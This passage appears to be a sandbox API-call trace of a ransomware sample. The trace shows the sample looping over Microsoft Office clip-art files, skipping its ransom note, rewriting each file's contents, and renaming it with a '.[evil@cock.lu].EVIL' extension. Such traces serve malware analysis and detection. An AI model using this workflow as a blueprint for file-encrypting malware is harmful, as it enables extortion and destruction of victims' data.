[0110.398] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF", dwFileAttributes=0x200) returned 0 [0110.398] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.398] wcsstr (_Str="BL00152_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.398] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 69 [0110.398] wcscmp (_String1="BL00152_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.398] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00152_.WMF") returned 0x0 [0110.398] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 0x45 [0110.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.400] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5ec, lpOverlapped=0x0) returned 1 [0110.402] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.403] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.403] _errno () returned 0x84b1160840 [0110.403] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.403] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x600, lpOverlapped=0x0) returned 1 [0110.403] CloseHandle (hObject=0x1a8) returned 1 [0110.403] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.403] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.403] __uncaught_exception () returned 0x84b1160800 [0110.403] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.403] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf.[evil@cock.lu].evil")) returned 1 [0110.404] ??_V@YAXPEAX@Z () returned 0x1 [0110.407] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF", dwFileAttributes=0x200) returned 0 [0110.407] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.407] wcsstr (_Str="BL00194_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.407] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 69 [0110.407] wcscmp (_String1="BL00194_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.407] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00194_.WMF") returned 0x0 [0110.407] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 0x45 [0110.407] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.409] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf92, lpOverlapped=0x0) returned 1 [0110.411] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.411] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.411] _errno () returned 0x84b1160840 [0110.411] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.411] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfa0, lpOverlapped=0x0) returned 1 [0110.411] CloseHandle (hObject=0x1a8) returned 1 [0110.411] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.411] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.411] __uncaught_exception () returned 0x84b1160800 [0110.411] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.412] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf.[evil@cock.lu].evil")) returned 1 [0110.412] ??_V@YAXPEAX@Z () returned 0x1 [0110.415] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF", dwFileAttributes=0x200) returned 0 [0110.415] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.415] wcsstr (_Str="BL00195_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.415] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 69 [0110.415] wcscmp (_String1="BL00195_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.415] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00195_.WMF") returned 0x0 [0110.415] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 0x45 [0110.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.417] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f86, lpOverlapped=0x0) returned 1 [0110.419] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.419] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.419] _errno () returned 0x84b1160840 [0110.419] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.419] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fa0, lpOverlapped=0x0) returned 1 [0110.420] CloseHandle (hObject=0x1a8) returned 1 [0110.420] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.420] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.420] __uncaught_exception () returned 0x84b1160800 [0110.420] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.420] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf.[evil@cock.lu].evil")) returned 1 [0110.421] ??_V@YAXPEAX@Z () returned 0x1 [0110.424] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF", dwFileAttributes=0x200) returned 0 [0110.424] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.424] wcsstr (_Str="BL00234_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.424] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 69 [0110.424] wcscmp (_String1="BL00234_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.424] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00234_.WMF") returned 0x0 [0110.424] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 0x45 [0110.424] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.426] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2458, lpOverlapped=0x0) returned 1 [0110.428] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.428] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.428] _errno () returned 0x84b1160840 [0110.428] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.428] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2460, lpOverlapped=0x0) returned 1 [0110.428] CloseHandle (hObject=0x1a8) returned 1 [0110.429] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.429] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.429] __uncaught_exception () returned 0x84b1160800 [0110.429] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.429] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf.[evil@cock.lu].evil")) returned 1 [0110.430] ??_V@YAXPEAX@Z () returned 0x1 [0110.432] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF", dwFileAttributes=0x200) returned 0 [0110.432] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.432] wcsstr (_Str="BL00242_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.432] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 69 [0110.432] wcscmp (_String1="BL00242_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.432] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00242_.WMF") returned 0x0 [0110.432] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 0x45 [0110.433] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.434] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfb8, lpOverlapped=0x0) returned 1 [0110.448] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.448] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.448] _errno () returned 0x84b1160840 [0110.448] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.448] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfc0, lpOverlapped=0x0) returned 1 [0110.448] CloseHandle (hObject=0x1a8) returned 1 [0110.448] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.449] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.449] __uncaught_exception () returned 0x84b1160800 [0110.449] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.449] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf.[evil@cock.lu].evil")) returned 1 [0110.449] ??_V@YAXPEAX@Z () returned 0x1 [0110.452] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF", dwFileAttributes=0x200) returned 0 [0110.452] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.452] wcsstr (_Str="BL00247_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.452] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 69 [0110.452] wcscmp (_String1="BL00247_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.452] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00247_.WMF") returned 0x0 [0110.452] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 0x45 [0110.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.454] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x386c, lpOverlapped=0x0) returned 1 [0110.456] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.456] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.456] _errno () returned 0x84b1160840 [0110.457] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.457] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x3880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3880, lpOverlapped=0x0) returned 1 [0110.457] CloseHandle (hObject=0x1a8) returned 1 [0110.457] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.457] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.457] __uncaught_exception () returned 0x84b1160800 [0110.457] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.457] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf.[evil@cock.lu].evil")) returned 1 [0110.458] ??_V@YAXPEAX@Z () returned 0x1 [0110.460] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF", dwFileAttributes=0x200) returned 0 [0110.461] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.461] wcsstr (_Str="BL00248_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.461] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 69 [0110.461] wcscmp (_String1="BL00248_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.461] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00248_.WMF") returned 0x0 [0110.461] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 0x45 [0110.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.462] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x600, lpOverlapped=0x0) returned 1 [0110.465] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.465] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.465] _errno () returned 0x84b1160840 [0110.465] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.465] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0110.465] CloseHandle (hObject=0x1a8) returned 1 [0110.465] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.465] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.465] __uncaught_exception () returned 0x84b1160800 [0110.465] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.465] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf.[evil@cock.lu].evil")) returned 1 [0110.466] ??_V@YAXPEAX@Z () returned 0x1 [0110.469] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF", dwFileAttributes=0x200) returned 0 [0110.469] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.469] wcsstr (_Str="BL00252_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.469] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 69 [0110.469] wcscmp (_String1="BL00252_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.469] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00252_.WMF") returned 0x0 [0110.469] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 0x45 [0110.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.471] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1264, lpOverlapped=0x0) returned 1 [0110.473] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.473] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.473] _errno () returned 0x84b1160840 [0110.473] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.473] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1280, lpOverlapped=0x0) returned 1 [0110.473] CloseHandle (hObject=0x1a8) returned 1 [0110.474] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.474] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.474] __uncaught_exception () returned 0x84b1160800 [0110.474] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.474] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf.[evil@cock.lu].evil")) returned 1 [0110.475] ??_V@YAXPEAX@Z () returned 0x1 [0110.477] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF", dwFileAttributes=0x200) returned 0 [0110.477] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.477] wcsstr (_Str="BL00254_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.477] _snwprintf (in: _Dest=0x84b0fddc50, 